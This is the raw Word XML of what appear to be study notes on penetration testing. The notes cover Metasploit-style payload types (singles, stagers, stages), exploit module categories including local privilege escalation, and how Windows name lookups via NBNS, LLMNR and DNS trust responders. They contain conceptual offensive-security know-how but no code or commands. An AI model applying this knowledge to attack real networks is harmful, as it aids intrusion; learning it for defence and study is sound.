    <w:p w14:paraId="1A6C2CEC" w14:textId="0D40D9ED" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>good if both have a firewall or if something doesn't have access to the internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43041FCB" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10448238" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Payload types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F445F28" w14:textId="0400DB23" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>singles - completely standalone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D035FF0" w14:textId="19736910" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">use if victim can't </w:t>
      </w:r>
      <w:r w:rsidR="00FB40DA" w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584754C" w14:textId="184C3694" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">inline, standalone, </w:t>
      </w:r>
      <w:r w:rsidR="00FB40DA" w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>single stage</w:t>
      </w:r>
      <w:r w:rsidR="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594A8DF" w14:textId="4D9DDB43" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>stagers - setup a network connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F38B2" w14:textId="02743F1D" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>no size restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCEDBA7" w14:textId="3A039CB7" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">stages - download and run by </w:t>
      </w:r>
      <w:r w:rsidR="00FB40DA" w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>stagers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD9173" w14:textId="74722FE7" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>more functionality for both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251C551" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660B746A" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploit modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DE4FE" w14:textId="46D39BE5" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">organized roughly by target OS and </w:t>
      </w:r>
      <w:r w:rsidR="00FB40DA" w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C6BFFC" w14:textId="34B938CE" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>windows/smb/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC00CF9" w14:textId="1B621E74" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>freebsd/telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BE91E8" w14:textId="62ECA120" w:rsidR="007B3D1E" w:rsidRPr="00FB40DA" w:rsidRDefault="007B3D1E" w:rsidP="00FB40DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB40DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>multi/http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F06F3D" w14:textId="1EB86EF7" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="007B3D1E" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">also includes local priv escalation </w:t>
      </w:r>
      <w:r w:rsidR="00532377" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E837AC" w14:textId="1883C3BB" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="00532377" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ACAA63" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="261156D5" w14:textId="009803B4" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="007B3D1E" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>aggressive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CEC12" w14:textId="2676C828" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="007B3D1E" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>run until complete</w:t>
      </w:r>
      <w:r w:rsidR="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763914F9" w14:textId="373293CF" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="00532377" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>usually,</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> client exploiting </w:t>
      </w:r>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E69BA2" w14:textId="49F720BD" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="00532377" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ED541E" w14:textId="369046DF" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="007B3D1E" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r w:rsidR="00532377" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0DA90" w14:textId="6BB502DE" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="00532377" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>usually,</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> server exploiting client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8DB414" w14:textId="0C38B001" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="007B3D1E" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>hybrid passive-aggressive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A426771" w14:textId="2601E55E" w:rsidR="007B3D1E" w:rsidRPr="00532377" w:rsidRDefault="00532377" w:rsidP="00532377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>usually,</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote file </w:t>
      </w:r>
      <w:r w:rsidR="00A35ABE" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>includes</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00532377">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50871D69" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A802A4C" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The life of a (windows) lookup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E387B1" w14:textId="6CA46E85" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">NBNS - </w:t>
      </w:r>
      <w:r w:rsidR="00A35ABE" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> name service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9623A" w14:textId="4A88DA39" w:rsidR="007B3D1E" w:rsidRPr="00A35ABE" w:rsidRDefault="007B3D1E" w:rsidP="00A35ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sends out ping to entire broadcast range, whoever answers you will trust</w:t>
      </w:r>
      <w:r w:rsidR="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A0524" w14:textId="31C91C31" w:rsidR="007B3D1E" w:rsidRPr="00A35ABE" w:rsidRDefault="007B3D1E" w:rsidP="00A35ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">happens at the same time as </w:t>
      </w:r>
      <w:r w:rsidR="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C40728" w14:textId="420278F8" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LLMNR - Link </w:t>
      </w:r>
      <w:r w:rsidR="00D528BD" w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>local</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> multicast name resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C532B2C" w14:textId="137AFA6E" w:rsidR="007B3D1E" w:rsidRPr="00A35ABE" w:rsidRDefault="00A35ABE" w:rsidP="00A35ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IPv6</w:t>
      </w:r>
      <w:r w:rsidR="007B3D1E" w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of NBNS, different things but act similarly</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC262E" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS - domain name service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40417B77" w14:textId="7F8348FB" w:rsidR="007B3D1E" w:rsidRPr="00A35ABE" w:rsidRDefault="007B3D1E" w:rsidP="00A35ABE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">AD has its own </w:t>
      </w:r>
      <w:r w:rsidR="00D528BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D528BD" w:rsidRPr="00A35ABE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>server.</w:t>
      </w:r>
    </w:p>
